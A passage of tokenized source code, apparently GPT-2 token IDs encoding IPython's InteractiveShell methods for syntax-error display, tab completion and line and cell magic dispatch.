6518, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 3601, 7, 944, 13, 9492, 5275, 22737, 13, 301, 65, 17, 5239, 7, 301, 65, 4008, 628, 220, 220, 220, 825, 905, 1837, 41641, 18224, 7, 944, 11, 29472, 28, 14202, 11, 2491, 62, 5589, 3902, 62, 8189, 28, 25101, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 23114, 262, 15582, 4049, 326, 655, 5091, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 1595, 470, 3359, 257, 8931, 12854, 780, 612, 2125, 470, 530, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1002, 257, 29472, 318, 1813, 11, 340, 318, 22259, 287, 262, 6631, 2427, 198, 220, 220, 220, 220, 220, 220, 220, 286, 644, 373, 612, 878, 357, 13893, 11361, 338, 30751, 1464, 3544, 198, 220, 220, 220, 220, 220, 220, 220, 33490, 8841, 24618, 618, 3555, 422, 257, 4731, 737, 628, 220, 220, 220, 220, 220, 220, 220, 1002, 262, 15582, 4049, 5091, 618, 2491, 257, 14102, 2438, 357, 72, 13, 68, 13, 2491, 62, 5589, 576, 62, 8189, 28, 17821, 828, 198, 220, 220, 220, 220, 220, 220, 220, 2392, 8931, 12854, 481, 307, 9066, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 304, 4906, 11, 1988, 11, 938, 62, 40546, 1891, 796, 2116, 13557, 1136, 62, 41194, 62, 10951, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 611, 29472, 290, 1189, 549, 4871, 7, 2963, 431, 11, 26375, 897, 12331, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1988, 13, 34345, 796, 29472, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1892, 262, 5794, 356, 1607, 26, 2666, 340, 3436, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 1002, 262, 4049, 5091, 618, 23710, 14102, 2438, 11, 356, 815, 2148, 1336, 8931, 40546, 13, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 396, 796, 12854, 1891, 13, 2302, 974, 62, 83, 65, 7, 12957, 62, 40546, 1891, 8, 611, 2491, 62, 5589, 3902, 62, 8189, 2073, 17635, 198, 220, 220, 220, 220, 220, 220, 220, 336, 65, 796, 2116, 13, 13940, 41641, 22737, 13, 7249, 1522, 62, 40546, 1891, 7, 2963, 431, 11, 1988, 11, 1288, 396, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13557, 12860, 40546, 1891, 7, 2963, 431, 11, 1988, 11, 336, 65, 8, 628, 220, 220, 220, 1303, 770, 318, 23170, 4651, 287, 24523, 9492, 5275, 23248, 284, 905, 257, 3275, 546, 198, 220, 220, 220, 1303, 262, 4064, 34274, 5536, 13, 198, 220, 220, 220, 825, 905, 521, 298, 341, 18224, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 34, 4262, 416, 4808, 5143, 62, 3846, 618, 612, 338, 281, 1423, 298, 341, 12331, 287, 2438, 5982, 198, 220, 220, 220, 220, 220, 220, 220, 379, 262, 6152, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 318, 23170, 4651, 287, 24523, 9492, 5275, 23248, 284, 905, 257, 3275, 546, 198, 220, 220, 220, 220, 220, 220, 220, 262, 4064, 34274, 5536, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 49596, 33567, 897, 18224, 3419, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 1100, 1370, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 2315, 62, 961, 1370, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 46162, 38827, 11617, 628, 220, 220, 220, 220, 220, 220, 220, 337, 2668, 284, 12094, 47611, 11, 994, 691, 284, 30276, 262, 2315, 9156, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 5345, 257, 1271, 286, 5050, 326, 4745, 319, 1100, 1370, 284, 307, 645, 12, 404, 198, 220, 220, 220, 220, 220, 220, 220, 14601, 13, 40539, 10786, 63, 15003, 62, 961, 1370, 63, 318, 645, 12, 404, 1201, 6101, 7535, 642, 13, 15, 290, 318, 2129, 31023, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2129, 8344, 341, 20361, 11, 8931, 5715, 28, 17, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 2617, 62, 23144, 62, 785, 1154, 353, 796, 645, 62, 404, 628, 220, 220, 220, 2488, 48267, 62, 4598, 310, 395, 198, 220, 220, 220, 825, 900, 62, 19545, 62, 15414, 7, 944, 11, 264, 11, 6330, 28, 25101, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 21394, 262, 705, 12286, 6, 5128, 4731, 329, 262, 1306, 3141, 1627, 13, 628, 220, 220, 220, 220, 220, 220, 220, 17934, 3712, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 554, 685, 16, 5974, 4808, 541, 13, 2617, 62, 19545, 62, 15414, 7203, 15496, 9678, 4943, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 554, 685, 17, 5974, 18435, 9678, 62, 220, 1303, 23493, 318, 994, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 45895, 62, 19545, 62, 15414, 796, 264, 628, 220, 220, 220, 825, 4808, 521, 298, 62, 14421, 62, 2536, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 7783, 262, 1459, 1241, 286, 33793, 341, 355, 257, 4731, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 15414, 62, 22018, 1967, 13, 1136, 62, 521, 298, 62, 2777, 2114, 3419, 1635, 705, 705, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 2420, 11939, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 2315, 62, 785, 1154, 353, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 24243, 1096, 262, 11939, 20230, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 8075, 11939, 20230, 326, 460, 307, 973, 416, 5456, 2438, 11, 198, 220, 220, 220, 220, 220, 220, 220, 2035, 9427, 2280, 287, 12, 14681, 357, 48126, 13973, 416, 262, 1100, 1370, 198, 220, 220, 220, 220, 220, 220, 220, 5888, 828, 1430, 49454, 357, 10508, 355, 287, 1332, 45861, 8, 393, 503, 12, 1659, 12, 14681, 198, 220, 220, 220, 220, 220, 220, 220, 357, 48126, 625, 262, 3127, 416, 6569, 2166, 2412, 737, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 422, 6101, 7535, 13, 7295, 13, 785, 1154, 353, 1330, 6101, 5377, 1154, 353, 198, 220, 220, 220, 220, 220, 220, 220, 422, 6101, 7535, 13, 7295, 13, 785, 1154, 353, 8019, 1330, 357, 21412, 62, 785, 1154, 353, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5536, 62, 5143, 62, 785, 1154, 353, 11, 22927, 62, 785, 1154, 353, 11, 13259, 62, 785, 1154, 353, 8, 628, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 5377, 1154, 353, 796, 6101, 5377, 1154, 353, 7, 29149, 28, 944, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 25745, 28, 944, 13, 7220, 62, 5907, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3298, 62, 14933, 10223, 28, 944, 13, 7220, 62, 20541, 62, 5907, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2560, 28, 944, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1267, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 11250, 333, 2977, 13, 33295, 7, 944, 13, 5377, 1154, 353, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 3060, 2183, 1224, 1010, 284, 262, 4096, 3392, 3170, 656, 6101, 5377, 1154, 353, 198, 220, 220, 220, 220, 220, 220, 220, 264, 6381, 79, 796, 2116, 13, 2536, 6381, 8071, 3533, 13, 1136, 10786, 20751, 62, 21812, 3256, 4285, 49354, 28955, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 2536, 6381, 8071, 3533, 17816, 20751, 62, 21812, 20520, 796, 264, 6381, 79, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 5377, 1154, 353, 13, 23144, 62, 785, 1154, 1010, 796, 264, 6381, 79, 628, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 2617, 62, 25480, 10786, 20751, 62, 21812, 3256, 8265, 62, 785, 1154, 353, 11, 965, 62, 2539, 796, 705, 11748, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 2617, 62, 25480, 10786, 20751, 62, 21812, 3256, 8265, 62, 785, 1154, 353, 11, 965, 62, 2539, 796, 705, 6738, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 2617, 62, 25480, 10786, 20751, 62, 21812, 3256, 8265, 62, 785, 1154, 353, 11, 965, 62, 2539, 796, 705, 4, 1385, 634, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 2617, 62, 25480, 10786, 20751, 62, 21812, 3256, 5536, 62, 5143, 62, 785, 1154, 353, 11, 965, 62, 2539, 796, 705, 4, 5143, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 2617, 62, 25480, 10786, 20751, 62, 21812, 3256, 22927, 62, 785, 1154, 353, 11, 965, 62, 2539, 796, 705, 4, 10210, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 2617, 62, 25480, 10786, 20751, 62, 21812, 3256, 13259, 62, 785, 1154, 353, 11, 965, 62, 2539, 796, 705, 4, 42503, 11537, 628, 220, 220, 220, 2488, 48267, 62, 4598, 310, 395, 198, 220, 220, 220, 825, 1844, 7, 944, 11, 2420, 11, 1627, 28, 14202, 11, 23493, 62, 1930, 28, 14202, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 13615, 262, 5668, 2420, 290, 257, 1351, 286, 1224, 45240, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2420, 1058, 4731, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 317, 4731, 286, 2420, 284, 307, 5668, 319, 13, 220, 632, 460, 307, 1813, 355, 6565, 290, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2427, 257, 1627, 14, 9150, 5166, 389, 1813, 13, 220, 554, 428, 1339, 11, 262, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1224, 353, 2346, 481, 6626, 262, 1627, 588, 1100, 1370, 857, 13, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1627, 1058, 4731, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 1844, 1627, 326, 2420, 318, 636, 286, 13, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 23493, 62, 1930, 1058, 493, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 2292, 286, 262, 23493, 319, 262, 5128, 1627, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 198, 220, 220, 220, 220, 220, 220, 220, 35656, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2420, 1058, 4731, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 4036, 2420, 326, 373, 5668, 13, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7466, 1058, 1351, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 317, 23243, 1351, 351, 477, 1744, 1224, 45240, 13, 628, 220, 220, 220, 220, 220, 220, 220, 383, 11902, 7159, 1249, 262, 11939, 284, 1011, 517, 4732, 656, 198, 220, 220, 220, 220, 220, 220, 220, 1848, 11, 290, 389, 636, 286, 262, 1877, 12, 5715, 11939, 7824, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 318, 257, 29908, 1088, 262, 11939, 9030, 11, 2092, 284, 644, 198, 220, 220, 220, 220, 220, 220, 220, 1100, 1370, 857, 379, 262, 3141, 1627, 618, 262, 309, 6242, 1994, 318, 2277, 13, 220, 2750, 198, 220, 220, 220, 220, 220, 220, 220, 21294, 340, 355, 257, 2446, 11, 340, 460, 307, 973, 416, 584, 1729, 12, 961, 1370, 198, 220, 220, 220, 220, 220, 220, 220, 12493, 357, 10508, 355, 19348, 3792, 8, 329, 2420, 11939, 13, 628, 220, 220, 220, 220, 220, 220, 220, 17427, 8748, 1672, 25, 628, 220, 220, 220, 220, 220, 220, 220, 554, 685, 16, 5974, 2124, 796, 705, 31373, 6, 628, 220, 220, 220, 220, 220, 220, 220, 554, 685, 17, 5974, 4808, 541, 13, 20751, 10786, 87, 13, 75, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 3806, 58, 17, 5974, 19203, 87, 13, 75, 3256, 37250, 87, 13, 75, 3137, 3256, 705, 87, 13, 21037, 3256, 705, 87, 13, 75, 36311, 6, 12962, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 554, 752, 3891, 656, 11593, 18780, 259, 834, 523, 356, 460, 1844, 319, 262, 2087, 3891, 13, 198, 220, 220, 220, 220, 220, 220, 220, 351, 2116, 13, 18780, 259, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 5377, 1154, 353, 13, 20751, 7, 5239, 11, 1627, 11, 23493, 62, 1930, 8, 628, 220, 220, 220, 825, 900, 62, 23144, 62, 785, 1154, 353, 7, 944, 11, 1224, 353, 11, 1426, 28, 15, 8, 4613, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 46245, 257, 649, 2183, 1224, 353, 2163, 13, 628, 220, 220, 220, 220, 220, 220, 220, 383, 2292, 4578, 357, 12286, 82, 284, 657, 8, 318, 262, 6376, 287, 262, 1224, 1010, 198, 220, 220, 220, 220, 220, 220, 220, 1351, 810, 345, 765, 262, 1224, 353, 284, 307, 18846, 13, 628, 220, 220, 220, 220, 220, 220, 220, 4600, 785, 1154, 353, 63, 815, 423, 262, 1708, 9877, 3712, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 825, 11939, 7, 944, 25, 955, 1154, 353, 11, 2420, 25, 4731, 8, 4613, 7343, 58, 2536, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 1892, 3546, 1154, 12061, 12331, 628, 220, 220, 220, 220, 220, 220, 220, 632, 481, 307, 5421, 284, 262, 1459, 955, 1154, 353, 4554, 290, 1208, 617, 2420, 198, 220, 220, 220, 220, 220, 220, 220, 290, 1441, 257, 1351, 351, 1459, 1224, 45240, 284, 1950, 284, 262, 2836, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 628, 220, 220, 220, 220, 220, 220, 220, 649, 5589, 796, 3858, 13, 17410, 6030, 7, 785, 1154, 353, 11, 2116, 13, 5377, 1154, 353, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 5377, 1154, 353, 13, 23144, 62, 6759, 3533, 13, 28463, 7, 1930, 11, 3605, 5589, 8, 628, 220, 220, 220, 825, 900, 62, 785, 1154, 353, 62, 14535, 7, 944, 11, 5739, 28, 14202, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 7248, 262, 5739, 286, 262, 1224, 353, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 611, 5739, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 5377, 1154, 353, 13, 14933, 10223, 796, 5739, 13, 69, 62, 17946, 874, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 5377, 1154, 353, 13, 20541, 62, 14933, 10223, 796, 5739, 13, 69, 62, 4743, 672, 874, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 5377, 1154, 353, 13, 14933, 10223, 796, 2116, 13, 7220, 62, 5907, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 5377, 1154, 353, 13, 20541, 62, 14933, 10223, 796, 2116, 13, 7220, 62, 20541, 62, 5907, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 2153, 873, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 1303, 2896, 1389, 994, 523, 326, 340, 338, 3017, 287, 262, 10314, 198, 220, 220, 220, 2488, 12543, 310, 10141, 13, 29988, 862, 7, 32707, 13, 13436, 873, 13511, 13, 30238, 62, 8818, 8, 628, 220, 220, 220, 825, 1057, 62, 1370, 62, 32707, 7, 944, 11, 5536, 62, 3672, 11, 1627, 11, 4808, 25558, 62, 18053, 28, 16, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 23002, 1133, 262, 1813, 1627, 5536, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 5536, 62, 3672, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6530, 286, 262, 10348, 5536, 2163, 11, 1231, 705, 4, 6, 21231, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1627, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 1334, 286, 262, 5128, 1627, 355, 257, 2060, 4731, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 4808, 25558, 62, 18053, 1058, 493, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 1057, 62, 1370, 62, 32707, 3419, 318, 1444, 422, 5536, 3419, 788, 4808, 25558, 62, 18053, 28, 17, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 770, 318, 2087, 284, 4155, 19528, 17764, 329, 779, 286, 705, 1136, 62, 541, 7535, 22446, 32707, 3419, 6, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 24714, 796, 2116, 13, 19796, 62, 1370, 62, 32707, 7, 32707, 62, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 611, 24714, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 12067, 796, 2116, 13, 19796, 62, 3846, 62, 32707, 7, 32707, 62, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2123, 489, 796, 366, 13949, 5536, 2163, 4600, 16626, 4, 82, 63, 407, 1043, 4, 82, 526, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3131, 796, 10148, 611, 12067, 318, 6045, 2073, 19203, 357, 1537, 2685, 5536, 4600, 36917, 4, 82, 63, 7160, 11, 705, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 20839, 345, 1612, 326, 2427, 10091, 6, 4064, 5536, 62, 3672, 1267, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 29566, 12331, 7, 316, 489, 4064, 357, 32707, 62, 3672, 11, 3131, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 5740, 25, 428, 318, 262, 5253, 287, 262, 8931, 284, 262, 2836, 338, 5739, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 770, 481, 761, 284, 307, 6153, 611, 262, 5387, 4585, 9156, 3011, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1006, 529, 1850, 11, 393, 2073, 356, 1183, 307, 11581, 262, 2642, 9633, 13, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 45559, 3810, 8931, 62, 18053, 6906, 319, 810, 1057, 62, 1370, 62, 32707, 3419, 468, 587, 1444, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8931, 62, 18053, 796, 4808, 25558, 62, 18053, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 651, 35226, 7, 22184, 11, 5536, 13, 45820, 2149, 62, 15285, 62, 53, 1503, 62, 49864, 6981, 62, 1404, 5446, 11, 10352, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 5536, 468, 18524, 503, 286, 1401, 62, 11201, 392, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5536, 62, 853, 62, 82, 796, 1627, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5536, 62, 853, 62, 82, 796, 2116, 13, 7785, 62, 11201, 392, 7, 1370, 11, 8931, 62, 18053, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 5930, 5536, 26498, 287, 257, 1351, 523, 356, 460, 869, 351, 277, 46491, 64, 8, 15582, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26498, 796, 685, 32707, 62, 853, 62, 82, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 479, 86, 22046, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 25339, 1957, 25745, 611, 356, 761, 340, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 651, 35226, 7, 22184, 11, 366, 50032, 62, 12001, 62, 29982, 1600, 10352, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 479, 86, 22046, 17816, 12001, 62, 5907, 20520, 796, 2116, 13, 1136, 62, 12001, 62, 29982, 7, 25558, 62, 18053, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 2116, 13, 18780, 259, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1255, 796, 24714, 46491, 22046, 11, 12429, 46265, 22046, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 1255, 628, 220, 220, 220, 825, 651, 62, 12001, 62, 29982, 7, 944, 11, 8931, 62, 18053, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 3855, 1957, 8354, 379, 1813, 8931, 6795, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 8931, 62, 18053, 1058, 493, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 36350, 3585, 284, 4585, 5739, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 25064, 13557, 1136, 14535, 7, 25558, 62, 18053, 1343, 352, 737, 69, 62, 17946, 874, 628, 220, 220, 220, 825, 1057, 62, 3846, 62, 32707, 7, 944, 11, 5536, 62, 3672, 11, 1627, 11, 2685, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 23002, 1133, 262, 1813, 2685, 5536, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 5536, 62, 3672, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6530, 286, 262, 10348, 5536, 2163, 11, 1231, 705, 4, 6, 21231, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1627, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 1334, 286, 262, 717, 5128, 1627, 355, 257, 2060, 4731, 13, 628, 220, 220, 220, 220, 220, 220, 220, 2685, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 1767, 286, 262, 2685, 355, 257, 357, 39363, 1963, 346, 500, 8, 4731, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 24714, 796, 2116, 13, 19796, 62, 3846, 62, 32707, 7, 32707, 62, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 611, 24714, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 300, 76, 796, 2116, 13, 19796, 62, 1370, 62, 32707, 7, 32707, 62, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2123, 489, 796, 366, 28780, 5536, 4600, 16626, 90, 15, 92, 63, 407, 1043, 90, 16, 92, 526, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3131, 796, 10148, 611, 300, 76, 318, 6045, 2073, 19203, 357, 1537, 1627, 5536, 4600, 4, 90, 15, 92, 63, 7160, 11, 705, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 20839, 345, 1612, 326, 2427, 10091, 4458, 18982, 7, 32707, 62, 3672, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 29566, 12331, 7, 316, 489, 13, 18982, 7, 32707, 62, 3672, 11, 3131, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2685, 6624, 10148, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3275, 796, 705, 16626, 90, 15, 92, 318, 257, 2685, 5536, 11, 475, 262, 2685, 1767, 318, 6565, 2637, 13, 18982, 7, 32707, 62, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2116, 13, 19796, 62, 1370, 62, 32707, 7, 32707, 62, 3672, 8, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3275, 15853, 705, 7731, 345, 1612, 262, 1627, 5536, 4064, 90, 15, 92, 357, 29762, 4064, 19427, 4458, 18982, 7, 32707, 62, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 29566, 12331, 7, 20500, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 5740, 25, 428, 318, 262, 5253, 287, 262, 8931, 284, 262, 2836, 338, 5739, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 770, 481, 761, 284, 307, 6153, 611, 262, 5387, 4585, 9156, 3011, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1006, 529, 1850, 11, 393, 2073, 356, 1183, 307, 11581, 262, 2642, 9633, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8931, 62, 18053, 796, 362, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 651, 35226, 7, 22184, 11, 5536, 13, 45820, 2149, 62, 15285, 62, 53, 1503, 62, 49864, 6981, 62, 1404, 5446, 11, 10352, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 5536, 468, 18524, 503, 286, 1401, 62, 11201, 392, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5536, 62, 853, 62, 82, 796, 1627, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5536, 62, 853, 62, 82, 796, 2116, 13, 7785, 62, 11201, 392, 7, 1370, 11, 8931, 62, 18053, 8, 198, 220, 